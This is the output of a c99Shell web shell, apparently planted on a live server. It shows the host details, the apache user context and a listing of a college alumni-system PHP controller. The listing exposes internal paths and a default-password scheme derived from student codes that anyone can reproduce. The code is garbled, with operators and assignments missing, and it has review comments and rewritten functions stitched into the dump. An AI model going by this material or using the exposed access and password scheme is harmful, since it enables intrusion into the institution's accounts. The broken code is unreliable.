!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/ealumni/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)


Viewing file:     ea_controller.php (13.27 KB)      -rwxr-xr-x
<?php
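// NOTE(review): display_errors is switched on for every request this controller
// serves, so warnings (file paths, query fragments) are written into the response.
// Production code normally logs errors instead of displaying them.
ini_set("display_errors", 1);

// The parent class My_controller is pulled in through a relative path.
include('application/controllers/my_controller.php');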
class 
Ea_controller extends My_controller {
    public 
$contents;
    
    public function 
__construct() {
        
parent::__construct();
        
$this->db $this->load->database('ea'TRUE);
    }
    
    function 
output($v$blog='') {
        
$this->contents['table_color_even'] = $this->config->item('table_c_even');
        
$this->contents['tr_color_even'] = $this->config->item('tr_c_even');
        
$this->contents['font_color_table'] = $this->config->item('font_c_table');
        
$this->contents['font_color_err'] = $this->config->item('font_c_err');

        if(
$blog!='') {
            
$msg['blog'] = $blog;
            
$this->blog $this->load->view('info/v_blog',$msg,true);
        }

        
$this->body $this->load->view($this->config->item("rg_folder").'v_header_js',$this->contents,true);
        
$this->body $this->load->view($v,$this->contents,true);
        
$this->show();
    }

    function 
output_detail($v) {
        
$this->contents['table_color_even'] = $this->config->item('table_c_even');
        
$this->contents['tr_color_even'] = $this->config->item('tr_c_even');
        
$this->contents['font_color_table'] = $this->config->item('font_c_table');
        
$this->contents['font_color_err'] = $this->config->item('font_c_err');

        
$lv['head'] = $this->load->view($this->config->item("rg_folder").'v_header_js',$this->contents,true);
        
$lv['body'] = $this->load->view($v,$this->contents,true);
        
$lv['footer'] = "";
        
        
$this->load->view('info/v_in',$lv);
    }

    function 
output_pdf($v) {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_config','cfg');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_acadconfig','ac');
        
        
$qu_cfg $this->cfg->qryCfg();
        if(
$row $qu_cfg->row()) {
            
$this->contents['cfgSiteName'] = $row->cfgSiteName;
            
$this->contents['cfgClgLogo'] = $row->cfgClgLogo;
            
$this->contents['cfgClgName'] = $row->cfgClgName;
            
$this->contents['cfgClgNameE'] = $row->cfgClgNameE;
            
$this->contents['cfgClgAddr'] = $row->cfgClgAddr;
            
$this->contents['cfgInstituteLogo'] = $row->cfgInstituteLogo;
            
$this->contents['cfgInstitute'] = $row->cfgInstitute;
            
$this->contents['cfgInstituteE'] = $row->cfgInstituteE;
            
$this->contents['cfgMinistry'] = $row->cfgMinistry;
            
$this->contents['cfgMinistryE'] = $row->cfgMinistryE;
            
$this->contents['font_color_err'] = $row->cfgFnClErrSpec;
        }
        
        
//$qu_ac = $this->ac->qryAc();
        
$qu_ac $this->ac->qryAcPrsIdRegistrarJoinPrs();
        if(
$row $qu_ac->row()) {
            
$this->contents['acExitExam'] = $row->acExitExam;
            
$this->contents['acCardExpiryDay'] = $row->acCardExpiryDay;
            
$this->contents['acCardExpiryMonth'] = $row->acCardExpiryMonth;
            
$this->contents['TSREGISTAR'] = $row->TSRegistrar;
            
$this->contents['TSREGISTARE'] = $row->TSRegistrarE;
            
$this->contents['DIRECTOR'] = $row->Director;
            
$this->contents['DIRECTORE'] = $row->DirectorE;
            
$this->contents['acPrsIdDirector'] = $row->acPrsIdDirector;
        }

        
$lv['head'] = "";
        
$lv['body'] = $this->load->view($v,$this->contents,true);
        
$lv['footer'] = "";
        
        
$this->load->view('info/v_in',$lv);
    }

    function 
getExcelHeader () {
        
$msg "header('Content-type: application/ms-xls');";
        
$msg .= "header('Content-Disposition: attachment; filename=\"report.xls\"');";
        
        return 
$msg;
    }

    function 
getWordHeader () {
        
$msg "header('Content-type: application/msword');";
        
$msg .= "header('Content-Disposition: attachment; filename=\"report.doc\"');";
        
        return 
$msg;
    }

    function 
load_model($model_name){
        
$model $this->config->item("rg_folder").$model_name;
        echo 
$model.'<br>';
        
$this->load->model($model,'m');
        
$model =& $this->m;
        unset(
$this->m);
        return 
$model;
    }
    
    function 
checkselect($str){
        if (
$str == "" || $str == "0") {
            
$this->form_validation->set_message('checkselect','กรุณาเลือก%s');
            return 
false;
        }else return 
true;
    }
    
    function 
checkupload($str){
        
$this->form_validation->set_message('checkupload','%s');
        return 
false;
    }

    function 
checkAdY($str) {
        if(
$str=='') {
            
$this->form_validation->set_message('checkAdY','กรุณาป้อน%s');
            return 
false;
        } else if(
is_numeric($str)==false) {
            
$this->form_validation->set_message('checkAdY','%sต้องเป็นตัวเลขเท่านั้น');
            return 
false;
        } else if(
strlen($str)!=4) {
            
$this->form_validation->set_message('checkAdY','%sจะต้องเท่ากับ 4 หลัก');
            return 
false;
        } else if(
$str==0) {
            
$this->form_validation->set_message('checkAdY','%sจะต้องมากกว่า 0');
            return 
false;
        } else {
            return 
true;
        }
    }

    function 
checkAdY_2($str) {
        if(
$str!="") {
            if(
is_numeric($str)==false) {
                
$this->form_validation->set_message('checkAdY','%sต้องเป็นตัวเลขเท่านั้น');
                return 
false;
            } else if(
strlen($str)!=4) {
                
$this->form_validation->set_message('checkAdY','%sจะต้องเท่ากับ 4 หลัก');
                return 
false;
            } else if(
$str==0) {
                
$this->form_validation->set_message('checkAdY','%sจะต้องมากกว่า 0');
                return 
false;
            } else {
                return 
true;
            }
        }
    }

    function 
checkAcY($str) {
        if(
$str=='') {
            
$this->form_validation->set_message('checkAcY','กรุณาป้อน%s');
            return 
false;
        } else if(
strlen($str)!=4) {
            
$this->form_validation->set_message('checkAcY','%sจะต้องเท่ากับ 4 หลัก');
            return 
false;
        } else if(
$str==0) {
            
$this->form_validation->set_message('checkAcY','%sจะต้องมากกว่า 0');
            return 
false;
        }

        if(
$str >= $this->input->post('admitAcY')) {
            return 
true;
        } else {
            
$this->form_validation->set_message('checkAcY','%sจะต้องมากกว่าหรือเท่ากับปีที่เข้า');
            return 
false;
        }
    }

    /**
     * Validation callback that compares the submitted date $str with the date posted in
     * the form field named by $field, and sets the 'checkFrDate' message on failure.
     *
     * splitDateForm2() is defined outside this listing; it is applied to $str always and
     * to the other date only when that value has no "-" after its first character.
     *
     * NOTE(review): this copy of the method is not valid PHP as shown - the assignment
     * operators, the commas between arguments and the comparison operator between
     * $start_date and $end_date are missing. Which comparison was used cannot be
     * recovered from this listing, so the code is left untouched; restore it from the
     * original file before relying on this check.
     */
    function 
checkFrDate($str$field) {
        
$end_date splitDateForm2($str,'-');

        
$alpha "-";
        
$tmp strpos($this->input->post($field), $alpha); // update case
        // NOTE(review): strpos() yields an offset or FALSE; the loose "== TRUE" below is
        // also false for offset 0, i.e. a value that starts with "-" counts as "no dash".
        
if($tmp==TRUE) {
            
$start_date $this->input->post($field);
        } else {
            
$start_date splitDateForm2($this->input->post($field),'-');
        }

        if(
// NOTE(review): comparison operator missing here (see method comment).
$start_date $end_date) {
            
$this->form_validation->set_message('checkFrDate''%s ต้องน้อยกว่าหรือเท่ากับ วันที่เริ่มต้น');
            return 
FALSE;
        } else {
            return 
TRUE;
        }
    }

    
// ################################## import data ##################################

    // check First node
    
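/**
 * Returns, as an integer, the value of the last 'name' entry found one level below
 * $arr, or 0 when there is none.
 *
 * The key test is strict: under loose comparison an integer key 0 equals 'name' on
 * older PHP versions and would be picked up by mistake. Input that cannot be iterated
 * (for example FALSE from a failed XML parse) yields 0 without raising a warning.
 *
 * @param mixed $arr Array or traversable object of arrays/objects.
 * @return int
 */
function checkFirstNode($arr) {
    $name = 0;
    if (!is_array($arr) && !is_object($arr)) {
        return 0;
    }

    foreach ($arr as $val) {
        if (!is_array($val) && !is_object($val)) {
            continue;
        }
        foreach ($val as $k => $v) {
            if ($k === 'name') {
                $name = $v;
            }
        }
    }

    return intval($name);
}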

    
// check End node
    
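/**
 * Returns, as an integer, the value of the last 'end' entry found one level below
 * $arr, or 0 when there is none.
 *
 * The key test is strict: under loose comparison an integer key 0 equals 'end' on
 * older PHP versions and would be picked up by mistake. Input that cannot be iterated
 * (for example FALSE from a failed XML parse) yields 0 without raising a warning.
 *
 * @param mixed $arr Array or traversable object of arrays/objects.
 * @return int
 */
function checkEndNode($arr) {
    $end = 0;
    if (!is_array($arr) && !is_object($arr)) {
        return 0;
    }

    foreach ($arr as $val) {
        if (!is_array($val) && !is_object($val)) {
            continue;
        }
        foreach ($val as $k => $v) {
            if ($k === 'end') {
                $end = $v;
            }
        }
    }

    return intval($end);
}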


    function 
copy_CurriculumConfig() {
        
//---[]--- start curl function
        
$url $this->config->item('url_reg2ea')."curl_CurriculumConfig";
        
$xmlStr "";
        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL$url);
        
curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
        
curl_setopt($chCURLOPT_POSTtrue);
        
curl_setopt($chCURLOPT_POSTFIELDS$xmlStr);
        
curl_setopt($chCURLOPT_HTTPHEADER, array('Expect:'));
        
$rs curl_exec($ch);
        
$httpcode curl_getinfo($chCURLINFO_HTTP_CODE);
        
curl_close ($ch);
        
//---[]--- end curl function

        
$rs_cc simplexml_load_string($rs);

        
$this->load->model($this->config->item("ea_folder").'m_ea_curriculumconfig','cc');

        
// เช็คข้อมูลมาครบหรือไม่
        
$firstNode $this->checkFirstNode($rs_cc);
        
$endNode $this->checkEndNode($rs_cc);

        if(
$firstNode==$endNode) {
            
$this->db->trans_begin();
            foreach(
$rs_cc as $key => $val) {
                if(
$val->ccId!='') {
                    
$this->cc->ccId $val->ccId;
                    
$qu_cc $this->cc->get_by_key();
                    if(
$qu_cc->num_rows()==0) {
                        
$this->cc->ccId intval($val->ccId);
                        
$this->cc->ccCode strval($val->ccCode);
                        
$this->cc->ccName strval($val->ccName);
                        
$this->cc->ccStatus strval($val->ccStatus);
                        
$this->cc->insert();
                    }
                }
            }

            if(
$this->db->trans_status() === false) {
                
$this->db->trans_rollback();
                return 
"F";
            } else {
                
$this->db->trans_commit();
                return 
true;
            }
        } else {
            
// fail copy
            
return "F";
        }
    }

    function 
copy_Edg() {
        
//---[]--- start curl function
        
$url $this->config->item('url_reg2ea')."curl_EduDegree";
        
$xmlStr "";
        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL$url);
        
curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
        
curl_setopt($chCURLOPT_POSTtrue);
        
curl_setopt($chCURLOPT_POSTFIELDS$xmlStr);
        
curl_setopt($chCURLOPT_HTTPHEADER, array('Expect:'));
        
$rs curl_exec($ch);
        
$httpcode curl_getinfo($chCURLINFO_HTTP_CODE);
        
curl_close ($ch);
        
//---[]--- end curl function

        
$rs_edg simplexml_load_string($rs);

        
$this->load->model($this->config->item("ea_folder").'m_ea_edudegree','edg');

        
// เช็คข้อมูลมาครบหรือไม่
        
$firstNode $this->checkFirstNode($rs_edg);
        
$endNode $this->checkEndNode($rs_edg);

        if(
$firstNode==$endNode) {
            
$this->db->trans_begin();
            foreach(
$rs_edg as $key => $val) {
                if(
$val->edgId!='') {
                    
$this->edg->edgId $val->edgId;
                    
$qu_edg $this->edg->get_by_key();

                    if(
$qu_edg->num_rows()==0) {
                        
$this->edg->edgId intval($val->ccId);
                        
$this->edg->edgName strval($val->edgName);
                        
$this->edg->edgNameE strval($val->edgNameE);
                        
$this->edg->edgAbbr strval($val->edgAbbr);
                        
$this->edg->edgAbbrE strval($val->edgAbbrE);
                        
$this->edg->insert();
                    }
                }
            }

            if(
$this->db->trans_status() === false) {
                
$this->db->trans_rollback();
                return 
"F";
            } else {
                
$this->db->trans_commit();
                return 
true;
            }

            return 
true;
        } else {
            
// fail copy
            
return "F";
        }
    }

    function 
copy_Cur() {
        
//---[]--- start curl function
        
$url $this->config->item('url_reg2ea')."curl_curriculum";
        
$xmlStr "";
        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL$url);
        
curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
        
curl_setopt($chCURLOPT_POSTtrue);
        
curl_setopt($chCURLOPT_POSTFIELDS$xmlStr);
        
curl_setopt($chCURLOPT_HTTPHEADER, array('Expect:'));
        
$rs curl_exec($ch);
        
$httpcode curl_getinfo($chCURLINFO_HTTP_CODE);
        
curl_close ($ch);
        
//---[]--- end curl function

        
$rs_cur simplexml_load_string($rs);

        
$this->load->model($this->config->item("ea_folder").'m_ea_curriculumdetails','curd');

        
// เช็คข้อมูลมาครบหรือไม่
        
$firstNode $this->checkFirstNode($rs_cur);
        
$endNode $this->checkEndNode($rs_cur);

        if(
$firstNode==$endNode) {
            
$this->db->trans_begin();
            foreach(
$rs_cur as $key => $val) {
                if(
$val->curId!='') {
                    
$this->curd->curId $val->curId;
                    
$qu_cur $this->curd->get_by_key();

                    if(
$qu_cur->num_rows()==0) {
                        
$this->curd->curId intval($val->curId);
                        
$this->curd->curImproveY intval($val->curImproveY);
                        
$this->curd->curName strval($val->curName);
                        
$this->curd->curNameE strval($val->curNameE);
                        
$this->curd->curAbbr strval($val->curAbbr);
                        
$this->curd->curAbbrE strval($val->curAbbrE);
                        
$this->curd->curStatus strval($val->curStatus);
                        
$this->curd->curCcId intval($val->curCcId);
                        
$this->curd->ccCode strval($val->ccCode);
                        
$this->curd->ccName strval($val->ccName);
                        
$this->curd->curEdgId intval($val->curEdgId);
                        
$this->curd->edgName strval($val->edgName);
                        
$this->curd->edgNameE strval($val->edgNameE);
                        
$this->curd->edgAbbr strval($val->edgAbbr);
                        
$this->curd->edgAbbrE strval($val->edgAbbrE);
                        
$this->curd->curElvId intval($val->curElvId);
                        
$this->curd->levelName strval($val->levelName);
                        
$this->curd->levelNameEng strval($val->levelNameEng);
                        
$this->curd->levelAbbr strval($val->levelAbbr);
                        
$this->curd->levelAbbrEng strval($val->levelAbbrEng);
                        
$this->curd->curAddType 'R';
                        
$this->curd->insert();
                    }
                }
            }

            if(
$this->db->trans_status() === false) {
                
$this->db->trans_rollback();
                return 
"F";
            } else {
                
$this->db->trans_commit();
                return 
true;
            }
        } else {
            
// fail copy
            
return "F";
        }
    }

    
//----[]--- ฟังก์ชั่น สร้าง umuser
    
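/**
 * Creates a user-management account for a student unless one already exists for
 * $stdCode, then adds the new user to group "191001".
 *
 * NOTE(review): the initial password is an MD5 digest of the student code wrapped in
 * two fixed strings, so it can be derived from the login name by anyone who has seen
 * this file, and MD5 is not a password hash. The scheme is left as it is because the
 * login check is outside this listing; plan a forced password change at first login
 * and a migration to a slow, per-user salted password hash. UsPwdExpDt is NULL, so
 * nothing visible here expires these passwords.
 * NOTE(review): the user insert and the group insert are not wrapped in a
 * transaction, and the group id is taken from getMaxUgID(); confirm that concurrent
 * imports cannot collide or leave a user without a group.
 *
 * @param string $stdCode    Student code; used as login name and as UsPsCode.
 * @param string $stdName    First name.
 * @param string $stdSurname Surname.
 * @return bool Always TRUE, whether or not an account was created.
 */
function importToUms($stdCode, $stdName, $stdSurname) {
    $this->load->model($this->config->item("ea_ums_folder").'m_umuser', 'um');
    $this->load->model($this->config->item("ea_ums_folder").'m_umusergroup', 'ug');

    $qu_um = $this->um->qryUmUserByUsPsCode($stdCode);
    if ($qu_um->num_rows() != 0) {
        // An account with this code already exists; nothing to do.
        return true;
    }

    $this->um->UsID        = "";
    $this->um->UsName      = $stdName." ".$stdSurname;
    $this->um->UsLogin     = $stdCode;
    $this->um->UsPassword  = md5("O]O".$stdCode."O[O");
    $this->um->UsPsCode    = $stdCode;
    $this->um->UsWgID      = "6";
    $this->um->UsQsID      = NULL;
    $this->um->UsAnswer    = NULL;
    $this->um->UsEmail     = NULL;
    $this->um->UsActive    = "1";
    $this->um->UsAdmin     = "0";
    $this->um->UsDesc      = NULL;
    $this->um->UsPwdExpDt  = NULL;
    $this->um->UsUpdDt     = NULL;
    $this->um->UsUpdUsID   = NULL;
    $this->um->UsSessionID = "";
    $this->um->insert();

    // Group membership for the user that was just inserted.
    $this->ug->UgID   = $this->ug->getMaxUgID();
    $this->ug->UgGpID = "191001";
    $this->ug->UgUsID = $this->um->last_insert_id();
    $this->ug->insert();

    return true;
}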
}
?>


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0131 ]--